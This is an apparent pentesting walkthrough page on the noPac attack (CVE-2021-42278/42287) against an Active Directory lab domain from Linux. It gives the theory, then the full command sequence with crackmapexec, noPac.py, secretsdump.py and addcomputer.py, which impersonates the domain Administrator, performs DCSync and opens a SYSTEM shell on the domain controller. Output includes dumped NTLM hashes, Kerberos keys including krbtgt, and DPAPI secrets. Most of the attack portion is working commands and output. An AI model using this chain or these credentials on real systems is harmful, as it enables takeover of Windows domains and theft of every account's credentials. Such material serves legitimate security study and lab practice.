From Linux With NoPAC.py

Theory

In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user.

CVE-2021-42278 - Name impersonation

Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts.

CVE-2021-42287 - KDC bamboozling

When requesting a Service Ticket, presenting a TGT is required first. When the service ticket is asked for is not found by the KDC, the KDC automatically searches again with a trailing $. What happens is that if a TGT is obtained for bob, and the bob user gets removed, using that TGT to request a service ticket for another user to himself (S4U2self) will result in the KDC looking for bob$ in AD. If the domain controller account bob$ exists, then bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any other user 🤯.

Machine Account

The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement to the attack chain. The easiest way this can be achieved is by creating a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it's greater than 0). The creator of the new machine account has enough privileges to edit its attributes. Alternatively, taking control over the owner/creator of a computer account should do the job.

The attack can then be conducted as follows.

  1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)

  2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ -> CVE-2021-42278

  3. Request a TGT for the controlled machine account

  4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)

  5. Request a service ticket with S4U2self by presenting the TGT obtained before -> CVE-2021-42287

  6. Get access to the domain controller (i.e. DCSync)

See if we have access to create a new computer

crackmapexec ldap nyc.newyork.local -u Donald.Trump -p MaKeam3ricaGr3at -d newyork.local -M MAQ

Download noPAC.py

mkdir exploiting_users
git clone https://github.com/Ridter/noPac.git
cd noPAC

Scanning to see if we have access

python3 scanner.py newyork.local/Donald.Trump:MaKeam3ricaGr3at -dc-ip 192.168.56.10  

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
                                           
                                        
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 192.168.56.10. Ticket size 1536
[*] Got TGT from 192.168.56.10. Ticket size 731

Dumping Dumping Dumping Love love

Geting ccache

python3 noPac.py newyork.local/Donald.Trump:MaKeam3ricaGr3at -dc-ip 192.168.56.10 --impersonate Administrator        

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target nyc.newyork.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-27AN50UBVJQ$"
[*] MachineAccount "WIN-27AN50UBVJQ$" password = 2Jl*Fv6x)K#S
[*] Successfully added machine account WIN-27AN50UBVJQ$ with password 2Jl*Fv6x)K#S.
[*] WIN-27AN50UBVJQ$ object = CN=WIN-27AN50UBVJQ,CN=Computers,DC=newyork,DC=local
[*] WIN-27AN50UBVJQ$ sAMAccountName == nyc
[*] Saving a DC's ticket in nyc.ccache
[*] Reseting the machine account to WIN-27AN50UBVJQ$
[*] Restored WIN-27AN50UBVJQ$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_nyc.newyork.local.ccache
[*] Attempting to del a computer with the name: WIN-27AN50UBVJQ$
[*] Delete computer WIN-27AN50UBVJQ$ successfully!

Adding ccache

export KRB5CCNAME=/home/kali/noPac/Administrator_NYC.newyork.local.ccache

Dumping love

secretsdump.py -k -no-pass -dc-ip 'nyc.newyork.local' @'nyc.newyork.local' 

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3a13b607b6a98cfaa24f28f7b87f8eaa
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
newyork\NYC$:plain_password_hex:0d3ca87af7a6b6582d328d9a339d3f08e26db92b364cbf1f22ff65cd8a7c21c5df23653efc2282d305816c9b931ade47cd06b2b64f095e3ee1f5a3a838a51c10a274344fbf385f73d33ad6048ee8279b02e2874bec3f9cb14248e852e334f96754e6c2d41d1111f5c3ce3539ffc0f740fb5df47ee3c87842d9fce41420b94ef81ad2ca4d7c74e60e1d34b7b329076e717ea2a33b8dddcd67f599bdcaf00be843cf53965a4dd22a0c73373ada1e217076270a49616a770f25598dec51f0066ffcb4857859979244e49463bd687c4eae672bafb15adf96198f67f5ad1a82b77ec63b8b5d78601f7d87ca22945f1bdea512
newyork\NYC$:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd673ff2efdb16b8755b3850c4a1dbe0ba64076a4
dpapi_userkey:0xf04ccfc9e2d558b843a92950ec2c2b5e67f2f8ba
[*] NL$KM 
 0000   22 34 01 76 01 70 30 93  88 A7 6B B2 87 43 59 69   "4.v.p0...k..CYi
 0010   0E 41 BD 22 0A 0C CC 23  3A 5B B6 74 CB 90 D6 35   .A."...#:[.t...5
 0020   14 CA D8 45 4A F0 DB 72  D5 CF 3B A1 ED 7F 3A 98   ...EJ..r..;...:.
 0030   CD 4D D6 36 6A 35 24 2D  A0 EB 0F 8E 3F 52 81 C9   .M.6j5$-....?R..
NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Donald.Trump:1113:aad3b435b51404eeaad3b435b51404ee:5c4af7d7a0e3091678e947c3ed151b81:::
hugo.Chavez:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
mateo.Pacheco:1115:aad3b435b51404eeaad3b435b51404ee:1ff4aa72d776c5834ba4893ab192f016:::
nicolas.Maduro:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
marco.Lopez:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
ramon.Maldonado:1118:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
rafael.Smith:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
diego.Montenegro:1120:aad3b435b51404eeaad3b435b51404ee:af41d274ce3ba74423fbe596cf944710:::
lorenzo.Cruz:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
jesus.Puello:1122:aad3b435b51404eeaad3b435b51404ee:2c1854ada028754e5d16113cab23fe5d:::
martin.Osuna:1123:aad3b435b51404eeaad3b435b51404ee:02166150bda700bc7be38198179b20fc:::
NYC$:1001:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
maryland$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827
Administrator:aes128-cts-hmac-sha1-96:0c72a36a70f696fbee13a25fd3412d43
Administrator:des-cbc-md5:7f2cd0836164e592
krbtgt:aes256-cts-hmac-sha1-96:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
krbtgt:aes128-cts-hmac-sha1-96:c1898a4681f6db2818eab08ef53c381c
krbtgt:des-cbc-md5:0b0e02f798cd6eef
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
Donald.Trump:aes256-cts-hmac-sha1-96:cb90153b8e84ebdede218c3fa9e7b0114d5b70b1735794eeb6cb10c3df86bf03
Donald.Trump:aes128-cts-hmac-sha1-96:98f19974c1e949670c9748f0e3a19145
Donald.Trump:des-cbc-md5:3875f4ba255198f2
hugo.Chavez:aes256-cts-hmac-sha1-96:482b83d108ab34176b2a839e41586b8a57b7c6715b0e26be90921188df0a27ff
hugo.Chavez:aes128-cts-hmac-sha1-96:4a85ba8bfde521b8a810dbfbd98ea751
hugo.Chavez:des-cbc-md5:c875e56110b07a9b
mateo.Pacheco:aes256-cts-hmac-sha1-96:3403436d003b92dffbe780d0e38b7c1ac4907396bc3008c17b68bc8e2bba2e07
mateo.Pacheco:aes128-cts-hmac-sha1-96:6a25e4122c1b1be9f09baf2c4a067207
mateo.Pacheco:des-cbc-md5:64da85f72a73804c
nicolas.Maduro:aes256-cts-hmac-sha1-96:697e05087154fa16c453e446d86eff4b0124ea9b66ead10c95350e23fa350fc9
nicolas.Maduro:aes128-cts-hmac-sha1-96:32b65f1fd540633a3c4e8a2af61b2172
nicolas.Maduro:des-cbc-md5:38f458256b866eea
marco.Lopez:aes256-cts-hmac-sha1-96:df994eed7edaf8c98a53737d82e67444eccdac084ddd46a856caa33442b988a3
marco.Lopez:aes128-cts-hmac-sha1-96:08f18af47f3bf7a596ce32b43cf8c048
marco.Lopez:des-cbc-md5:34b02f0d5432ad92
ramon.Maldonado:aes256-cts-hmac-sha1-96:52ab5589df5e392653cf85f187734169bd790c3d494c6d4afb155a50f5044ccb
ramon.Maldonado:aes128-cts-hmac-sha1-96:4c5b542e7892582746a4c8859e89e463
ramon.Maldonado:des-cbc-md5:b5cbe9dcfb854f0e
rafael.Smith:aes256-cts-hmac-sha1-96:308f3818f4b13d299b142dfd9b64ea7e18141cd8799f5b276d8ad668a93b0d55
rafael.Smith:aes128-cts-hmac-sha1-96:e77e9d15a15f93d27941f0a5c9b83e54
rafael.Smith:des-cbc-md5:9e5e9b3b670da797
diego.Montenegro:aes256-cts-hmac-sha1-96:c76fd032ca861dcf0816dbd7da32581f18c3e93168357d3cdc1f1f6917d22be2
diego.Montenegro:aes128-cts-hmac-sha1-96:fd38c66b17c5506fc7a748ed5d9025da
diego.Montenegro:des-cbc-md5:3ed68f9429625879
lorenzo.Cruz:aes256-cts-hmac-sha1-96:629162d8463f6686e1f8245e8706d358c7844883dea03f3c689ba103ebefb999
lorenzo.Cruz:aes128-cts-hmac-sha1-96:100012bed065340c357e06def2cda4a6
lorenzo.Cruz:des-cbc-md5:2c31583d430d94e0
jesus.Puello:aes256-cts-hmac-sha1-96:a311ddc97a776dd51751455d4d4642cd9831cba5486ebdcf160bddcd058190d6
jesus.Puello:aes128-cts-hmac-sha1-96:d084b847cedaef57f3af254eee399205
jesus.Puello:des-cbc-md5:4c026b26a4dcdcfd
martin.Osuna:aes256-cts-hmac-sha1-96:f372506351df0a3620c8e0e77fc5efbc53b02699edee87a6d7b8d3007b3dd524
martin.Osuna:aes128-cts-hmac-sha1-96:51e74907a4d3cfce080d19eb02847685
martin.Osuna:des-cbc-md5:1ada4fcec273b9e6
NYC$:aes256-cts-hmac-sha1-96:ab4c2384afa3b1bce4947297088871e97bf546c4eabfee82e726c97c11d118b6
NYC$:aes128-cts-hmac-sha1-96:be559494ce4e842ab4ce508aa86370f3
NYC$:des-cbc-md5:8034974fe07a10a4
NORTH$:aes256-cts-hmac-sha1-96:7a2c03c56595fc285d4573df462b20c187118d10c91508fc188605dbf3c40d30
NORTH$:aes128-cts-hmac-sha1-96:ab3de201f07d56372fec8b4fa5d28afc
NORTH$:des-cbc-md5:6858ae1acec7d6d3
maryland$:aes256-cts-hmac-sha1-96:c5660c1cd2d309d6d3c109223d5d9d7d81fdc9a34b6568df7cf78ed169e2030a
maryland$:aes128-cts-hmac-sha1-96:9d492c71d4a716fa56ec386d8f732f9e
maryland$:des-cbc-md5:9897a46b76255815

Exploiting and getting Shell

python3 noPac.py newyork.local/Donald.Trump:MaKeam3ricaGr3at -dc-host nyc -just-dc-ntlm --impersonate Administrator -shell




███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target nyc.newyork.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-LXRB5OUWKFP$"
[*] MachineAccount "WIN-LXRB5OUWKFP$" password = Oykv^)T@zb&j
[*] Successfully added machine account WIN-LXRB5OUWKFP$ with password Oykv^)T@zb&j.
[*] WIN-LXRB5OUWKFP$ object = CN=WIN-LXRB5OUWKFP,CN=Computers,DC=newyork,DC=local
[*] WIN-LXRB5OUWKFP$ sAMAccountName == nyc
[*] Saving a DC's ticket in nyc.ccache
[*] Reseting the machine account to WIN-LXRB5OUWKFP$
[*] Restored WIN-LXRB5OUWKFP$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_nyc.newyork.local.ccache
[*] Attempting to del a computer with the name: WIN-LXRB5OUWKFP$
[*] Delete computer WIN-LXRB5OUWKFP$ successfully!
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
NYC

cleanup cleanup, everybody lets cleanup

addcomputer.py -computer-name 'samaccountname$' -delete -dc-host nyc.newyork.local -domain-netbios NEWYORK -hashes 'aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e' 'newyork.local/Administrator'
PreviousSemi Manual ExploitNextFrom Windows With noPAC.exe

Last updated